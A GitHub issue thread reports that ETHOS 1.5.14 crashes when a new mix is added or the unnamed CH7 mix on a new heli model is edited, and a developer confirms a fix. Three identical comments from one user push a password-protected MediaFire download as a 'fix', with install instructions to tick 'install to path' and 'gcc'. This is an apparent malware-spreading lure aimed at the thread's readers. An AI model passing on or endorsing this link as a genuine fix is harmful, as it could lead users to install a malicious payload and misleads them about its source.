### ISSUE TITLE
ETHOS 1.5.14 Emergency Mode / Crash if adding new Mixer

### ISSUE THREAD

**Issue by garfield2412** [FrSkyRC/ETHOS-Feedback-Community#4443]
hi There,

i just updated to 1.5.14 and i wanted to add a Mix to my Heli Model (new renamed Bank Mix) --> the X20ProAW freezed at the time pressing the "+"
tried it seperate times, same behaviour.
Can edit existing mix!

then i created a new helimodel (FBL) --> same behavior, freeze
on the new Heli Model, a predefined mix on CH7 is created, but without a name.
if i'd like to edit the mix on CH7 --> Emergency Mode
Do you notice the strange text on the CH7 on the new Model??
![screenshot-2024-08-27-25755](https://github.com/user-attachments/assets/9b141b26-5dda-40ba-8860-d46fd01f2c68)

Possible issue with the renaming of Flightmode to Bank in ETHOS 1.5.14?
Problem doesn't exist on an Airplane Model!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by garfield2412** [comment]
tried to do the same thing in the 1.5.14 simulator.
1 New FBL Heli model
2. edit the mixes, CH7 was created without a name
3. if i mark the ch7 the simulator crashes
4. if i restart the simulator "Data invalid - start model wizzard"
5. then go to mixes, mark CH7 --> crash once again

https://github.com/user-attachments/assets/fb5d866b-f57a-436a-9f33-6a509f8d0ee9

**Comment by bsongis-frsky** [comment]
Yes. We have already fixed it. Last minute change, I shouldn't have accepted it, too dangerous!

**Comment by philippe-warnotte** [comment]
Oups! Me too...
